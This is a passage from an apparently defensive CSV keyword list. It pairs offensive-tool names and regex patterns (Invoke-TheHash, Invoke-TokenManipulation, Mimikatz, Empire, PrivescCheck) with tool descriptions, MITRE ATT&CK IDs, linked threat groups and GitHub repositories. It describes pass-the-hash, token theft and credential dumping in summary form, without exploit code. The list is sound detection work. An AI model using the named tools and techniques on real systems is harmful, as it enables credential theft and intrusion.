- APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-Tater.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49746" "*Invoke-Tater.ps1*",".{0,1000}Invoke\-Tater\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1119","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49747" "*Invoke-Tater.ps1*",".{0,1000}Invoke\-Tater\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - 
T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49748" "*Invoke-TcpEndpointsCheck*",".{0,1000}Invoke\-TcpEndpointsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49749" "*Invoke-TheHash*",".{0,1000}Invoke\-TheHash.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49750" "*Invoke-TheHash.ps1*",".{0,1000}Invoke\-TheHash\.ps1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49751" "*Invoke-TheHash.psd1*",".{0,1000}Invoke\-TheHash\.psd1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49752" "*Invoke-TheHash.psm1*",".{0,1000}Invoke\-TheHash\.psm1.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. 
Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","FoxKitten","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","1","N/A","N/A","10","10","1569","308","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z","49753" "*Invoke-TheKatz*",".{0,1000}Invoke\-TheKatz.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49754" "*Invoke-ThirdPartyDriversCheck*",".{0,1000}Invoke\-ThirdPartyDriversCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49755" "*Invoke-ThreadedFunction*",".{0,1000}Invoke\-ThreadedFunction.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","HTTP-Login.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49756" "*Invoke-Thunderfox*",".{0,1000}Invoke\-Thunderfox.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49757" "*Invoke-Thunderstruck*",".{0,1000}Invoke\-Thunderstruck.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49758" "*Invoke-TmpDavFS*",".{0,1000}Invoke\-TmpDavFS.{0,1000}","offensive_tool_keyword","Invoke-TmpDavFS","Memory Backed Powershell WebDav Server - Creates a memory backed webdav server using powershell that can be mounted as a filesystem. 
Note: Mounting the remote filesystem on windows implies local caching of accessed files in the C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV system directory.","T1020 - T1059 - T1573 - T1210","TA0002 - TA0011 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/p3nt4/Invoke-TmpDavFS","1","0","N/A","N/A","N/A","2","138","27","2021-03-07T19:07:39Z","2018-07-01T13:21:11Z","49759" "*Invoke-TokenDuplication.ps1*",".{0,1000}Invoke\-TokenDuplication\.ps1.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","1","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","49760" "*Invoke-TokenManipulation -CreateProcess *cmd.exe*",".{0,1000}Invoke\-TokenManipulation\s\-CreateProcess\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 - TA0002 - TA0009 - TA0006","N/A","N/A","Credential Access","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","49761" "*Invoke-TokenManipulation*",".{0,1000}Invoke\-TokenManipulation.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Invoke-TokenManipulation script Tokens can be impersonated from other users with a session/running processes on the machine. 
Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","Black Basta","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49762" "*Invoke-TokenManipulation*",".{0,1000}Invoke\-TokenManipulation.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49763" 
"*Invoke-TokenManipulation*",".{0,1000}Invoke\-TokenManipulation.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49764" "*Invoke-TokenManipulation*",".{0,1000}Invoke\-TokenManipulation.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","49765" "*Invoke-TokenManipulation.ps1*",".{0,1000}Invoke\-TokenManipulation\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1058","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE 
- Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49766" "*Invoke-TokenManipulation.ps1*",".{0,1000}Invoke\-TokenManipulation\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","49767" "*Invoke-Tokenvator*",".{0,1000}Invoke\-Tokenvator.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wrapped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49768" "*Invoke-UacCheck*",".{0,1000}Invoke\-UacCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49769" "*Invoke-UacCheck*",".{0,1000}Invoke\-UacCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - 
TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49770" "*Invoke-UdpEndpointsCheck*",".{0,1000}Invoke\-UdpEndpointsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49771" "*Invoke-UnattendFilesCheck*",".{0,1000}Invoke\-UnattendFilesCheck.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","49772" "*Invoke-UnattendFilesCheck*",".{0,1000}Invoke\-UnattendFilesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49773" "*Invoke-UpdateMimikatzScript.ps1*",".{0,1000}Invoke\-UpdateMimikatzScript\.ps1.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. 
pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/g4uss47/Invoke-Mimikatz","1","1","N/A","N/A","10","1","62","14","2024-04-18T14:28:21Z","2020-09-22T16:47:19Z","49774" "*Invoke-UrbanBishop*",".{0,1000}Invoke\-UrbanBishop.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49775" "*invoke-urlcheck -urls*",".{0,1000}invoke\-urlcheck\s\-urls.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - 
T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","49776" "*Invoke-URLFileClean -WritableShares * -URLAttackFileName*",".{0,1000}Invoke\-URLFileClean\s\-WritableShares\s.{0,1000}\s\-URLAttackFileName.{0,1000}","offensive_tool_keyword","Invoke-ShareHunter","Enumerate the Domain for Readable and Writable Shares","T1135","TA0007","N/A","N/A","Discovery","https://github.com/Leo4j/Invoke-ShareHunter","1","0","N/A","N/A","5","1","17","1","2025-02-18T14:56:51Z","2023-09-21T14:31:17Z","49777" "*Invoke-UserCheck*",".{0,1000}Invoke\-UserCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49778" "*Invoke-UserEnumerationAsOutsider*",".{0,1000}Invoke\-UserEnumerationAsOutsider.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","1","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","49779" "*Invoke-UserEnvCheck*",".{0,1000}Invoke\-UserEnvCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49780" "*Invoke-UserGroupsCheck*",".{0,1000}Invoke\-UserGroupsCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49781" "*invokeuserhunter*",".{0,1000}invokeuserhunter.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - 